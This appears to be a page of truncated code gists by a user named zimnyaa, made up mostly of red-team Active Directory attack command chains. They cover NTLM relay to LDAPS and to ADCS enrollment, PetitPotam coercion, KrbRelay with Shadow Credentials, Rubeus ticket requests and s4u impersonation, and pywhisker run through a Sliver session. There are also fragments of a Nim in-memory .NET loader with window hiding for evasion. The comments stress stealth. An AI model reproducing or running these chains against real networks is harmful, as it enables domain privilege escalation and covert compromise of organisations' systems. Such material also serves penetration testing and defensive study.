zimnyaa

import winim/clr
import os
import nimpy

#Create dup handles
proc dup(oldfd: FileHandle): FileHandle {.importc, header: "unistd.h".}
proc dup2(oldfd: FileHandle, newfd: FileHandle): cint {.importc,
    header: "unistd.h".}

zimnyaa

# runs on kali out-of-the-box

# this is not a ready-made script, more like a collection of commands

# QEMU mounting a drive
modprobe nbd max_part=16
qemu-nbd -c /dev/nbd0 filename.vhdx

# look for the second partition, usually where the FS resides
fdisk -l /dev/nbd0

zimnyaa

# setting up a DNS record in the domain, the zone I required was found in ForestDNSZones
python3 ./krbrelayx/dnstool.py -u DOMAIN\\zimnyaa -p <PASSWORD> -a add -r testrecord -d <MY_IP> --forest DC1.DOMAIN.local

# setting up a LDAPS relay to grant RBCD to computer account we have
# in my case MAQ = 0, so I escalated on a domain workstation and used it
sudo impacket-ntlmrelayx -smb2support -t ldaps://DC1.DOMAIN.local --http-port 8080 --delegate-access --escalate-user MYWS\$ --no-dump --no-acl --no-da

# PetitPotam to WebDAV with domain credentials (not patched)
# DO NOT use FQDN here
python3 PetitPotam.py -d DOMAIN.local -u zimnyaa -p <PASSWORD> testrecord@8080/a TARGETSERVER

zimnyaa

import sys, os


nim_template = """import winim/clr
import os
import strutils



proc execute(assembly_bytes: openarray[byte], args: openarray[string])  =

zimnyaa

when defined hidewindow:
  proc wndenumcallback(windowHandle: HWND, param: LPARAM): WINBOOL {.stdcall.} = 
    var process_id: DwORD
    var wanted = cast[ptr DWORD](param)
    GetWindowThreadProcessId(windowHandle, &process_id);
    if process_id == wanted[]:
            ShowWindow(windowHandle, SW_FORCEMINIMIZE)
    return true
  
  proc hidewindow() = 

zimnyaa

# setting up the relay. I avoid LLMNR/NBNS/DHCPv6/etc, as they're too noisy, and prefer either UNC path injection
# (somewhere custom), or NTLM hash farming
python3 ./ntlmrelayx.py -t http://ca1.contoso.com/certsrv/certfnsh.asp --adcs -smb2support

# ntlmrelayx ADCS outputs an unencrypted .pfx 
cat lowpriv.b64 | base64 --decode > lowpriv.pfx

# dirkjanm PKINITTools, had to patch impacket previously to output AES session keys 
python3 gettgtpkinit.py contoso.com/lowpriv -cert-pfx lowpriv.pfx lowpriv.ccache -v

zimnyaa

# creating RPC server, relaying SYSTEM Kerberos authentication to LDAP
# we will use Shadow Credentials instead of RBCD to not rely on ms-ds-machineAccountQuota and be a little more stealthy
# clsid from cube0x0 KrbRelay repo
.\KrbRelay.exe -spn ldap/dc1.contoso.com -shadowcred -clsid 0bae55fc-479f-45c2-972e-e951be72c0c1

# KrbRelay outputs a Rubeus command for you, but you do not need to unPAC
Rubeus.exe asktgt /user:Client1$ /certificate:<cert> /password:"<pass>" /nowrap

# PTH to SMB is a spook, better request a ticket
.\Rubeus.exe s4u /ticket:<ticket> /impersonateuser:Install /self /altservice:cifs/client1.contoso.com /nowrap

zimnyaa

New-LabDefinition -Name Lab1CA1 -DefaultVirtualizationEngine Azure

$azureDefaultLocation = 'Australia East' # CHANGETHIS

Add-LabAzureSubscription -DefaultLocationName $azureDefaultLocation

#defining default parameter values, as these ones are the same for all the machines
$PSDefaultParameterValues = @{
    'Add-LabMachineDefinition:DomainName' = 'contoso.com'

zimnyaa

import re, sys

def rule_startswith(ioc_string):
	def __match(pipename):
		if pipename.startswith(ioc_string):
			print("\tMATCH startswith({})".format(ioc_string))
			return True
		return False
	return __match

zimnyaa

# getting the current ticket
sliver (SESSION) > rubeus tgtdeleg /nowrap
echo <ticket> | base64 --decode > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache

# adding ms-KeyCredentialLink
proxychains4 python3 pywhisker/pywhisker.py -k -d "domain" --target "dcagent" -u "dadmin" --action "add" --filename cert

# requesting a ticket with ShadowCredentials
proxychains4 python3 gettgtpkinit.py -cert-pfx ../cert.pfx -pfx-pass pass -dc-ip dc1.domain domain/dcagent dcagent.ccache